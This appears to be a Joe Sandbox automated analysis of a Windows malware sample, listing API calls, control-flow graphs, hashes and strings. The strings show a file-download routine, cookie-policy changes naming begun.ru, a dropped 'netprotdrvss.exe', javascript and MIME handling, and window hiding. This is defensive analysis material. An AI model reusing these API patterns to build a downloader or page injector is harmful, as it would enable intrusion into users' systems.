                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                  APIs
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID:
                  • API String ID: 3356406503-0
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 354 407036-407069 DeleteFileW CreateFileW 355 407078-407087 GetLastError 354->355 356 40706b-407073 354->356 357 407095-4070b6 InternetOpenUrlW 355->357 358 407089-40708f SetEndOfFile 355->358 359 407147-407149 356->359 360 4070c6-4070eb InternetQueryDataAvailable 357->360 361 4070b8-4070c4 CloseHandle 357->361 358->357 363 407119-407121 InternetReadFile 360->363 362 407143 361->362 366 407145-407146 362->366 364 407123-40713b CloseHandle InternetCloseHandle 363->364 365 4070ed-4070f0 363->365 364->366 368 40713d-407140 364->368 365->364 367 4070f2-407116 WriteFile 365->367 366->359 367->363 368->362
                  APIs
                  • DeleteFileW.KERNEL32(?), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32 ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                  • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                  • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID: c{@
                  • API String ID: 3735792614-264719814
                  • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetForegroundWindow.USER32 ref: 0040A065
                  • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,?), ref: 0040A07E
                  • SetForegroundWindow.USER32(00000000), ref: 0040A088
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: ForegroundWindow$CreateInstance
                  • String ID:
                  • API String ID: 2498160819-0
                  • Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                  • Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
                  • Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                  • Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00406CCF
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                  • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
                  • Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 129 40b096-40b0ac call 40d5b0 132 40b0b5-40b0bb 129->132 133 40b0ae-40b0b0 129->133 135 40b0bd-40b0cd call 407995 132->135 136 40b0cf-40b0d1 call 407951 132->136 134 40b2c9-40b2cd 133->134 140 40b0d6-40b0e5 135->140 136->140 141 40b160-40b166 140->141 142 40b0e7-40b0f1 140->142 143 40b177 InternetClearAllPerSiteCookieDecisions 141->143 144 40b168-40b175 InternetSetPerSiteCookieDecisionW 141->144 142->141 145 40b0f3-40b0f9 142->145 146 40b17d-40b184 143->146 144->146 145->141 147 40b0fb-40b10b GetModuleFileNameW 145->147 154 40b186-40b196 GetLastError call 40a786 146->154 155 40b199-40b1a2 146->155 148 40b116-40b118 GetCurrentDirectoryW 147->148 149 40b10d-40b114 call 406cf9 147->149 150 40b11e-40b15a call 405511 call 4054ed 148->150 149->150 150->133 150->141 154->155 157 40b1a9-40b1ae 155->157 160 40b1b0-40b1cd CreateThread 157->160 161 40b1ce-40b1df 157->161 160->161 161->157 164 40b1e1-40b1e7 161->164 166 40b1e9-40b1eb 164->166 167 40b1ed-40b200 call 40a786 164->167 166->167 168 40b221-40b226 166->168 175 40b202-40b209 call 40b023 167->175 176 40b20e-40b210 167->176 172 40b228-40b23b CloseHandle 168->172 173 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 168->173 172->172 172->173 180 40b2c6-40b2c8 173->180 181 40b24d-40b257 173->181 175->176 176->168 179 40b212-40b21b WaitForMultipleObjects 176->179 179->168 180->134 181->180 182 40b259-40b25f 181->182 182->180 183 40b261-40b271 GetModuleFileNameW 182->183 184 40b273-40b27a call 406cf9 183->184 185 40b27c-40b27e GetCurrentDirectoryW 183->185 187 40b284-40b2c0 call 405511 call 4054ed 184->187 185->187 187->133 187->180
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 194 409c99-409cac call 40d5b0 197 409cb9 194->197 198 409cae-409cb7 call 405451 194->198 200 409cbb-409cd6 InternetOpenUrlW 197->200 198->200 202 409cd8-409cda 200->202 203 409cdf-409d02 GetProcessHeap HeapAlloc 200->203 204 409df1-409df3 202->204 205 409d04-409d06 203->205 206 409d5b-409d77 InternetReadFile 203->206 207 409def-409df0 205->207 208 409d79-409d90 GetProcessHeap HeapAlloc 206->208 209 409d0b-409d10 206->209 207->204 211 409d92-409d95 208->211 212 409d97-409daa 208->212 209->208 210 409d12-409d1d 209->210 213 409d3d-409d59 call 40c5d0 210->213 214 409d1f-409d3b GetProcessHeap HeapReAlloc 210->214 215 409de0-409dec GetProcessHeap HeapFree 211->215 216 409dd6-409dde 212->216 217 409dac-409dae 212->217 213->206 214->205 214->213 215->207 216->215 217->216 219 409db0-409db6 217->219 219->216 221 409db8-409dca 219->221 221->216 222 409dcc-409dd4 221->222 222->216 222->221
                  APIs
                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                  • String ID: hOA
                  • API String ID: 1355009786-3485425990
                  • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                  • API String ID: 536389180-1762329985
                  • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-1081452883
                  • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 369 409301-409316 371 409326-409339 369->371 372 409318-40931d 369->372 376 409364-409374 371->376 377 40933b-409357 CharLowerW call 405493 371->377 372->371 373 40931f-409321 372->373 374 4093ff-409401 373->374 383 40937a-409398 376->383 384 4093fb 376->384 381 409362 SysFreeString 377->381 382 409359-40935d SysFreeString 377->382 381->376 385 4093fe 382->385 383->384 388 40939a-4093ac 383->388 384->385 385->374 390 4093f2-4093f7 388->390 391 4093ae-4093d9 SysAllocString * 2 388->391 390->384 393 4093e2-4093f1 SysFreeString * 2 391->393 394 4093db 391->394 393->390 394->393
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript
                  • API String ID: 1987340527-3435494457
                  • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 396 406adf-406b32 call 40d5b0 call 405511 call 4054ed RegOpenKeyExW 403 406b34-406b4d call 4069c0 396->403 404 406b4f-406b51 396->404 403->404 408 406b56-406b94 call 405511 call 4054ed RegOpenKeyExW 403->408 406 406c72-406c76 404->406 413 406b96-406baa call 4069c0 408->413 414 406bac-406bc8 call 4069fd 408->414 413->414 419 406bcc-406bdf call 405467 413->419 420 406be1-406c1f call 405511 call 4054ed RegOpenKeyExW 414->420 421 406bca 414->421 419->414 419->420 428 406c21-406c35 call 4069c0 420->428 429 406c37-406c53 call 4069fd 420->429 421->404 428->429 434 406c5a-406c6d call 405467 428->434 435 406c55 429->435 436 406c6f-406c71 429->436 434->429 434->436 435->404 436->406
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: b8f2284a7884e1d84c5472764473ad81ef61371c27a8aebe337e069d7a055d2a
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(?,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(?,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
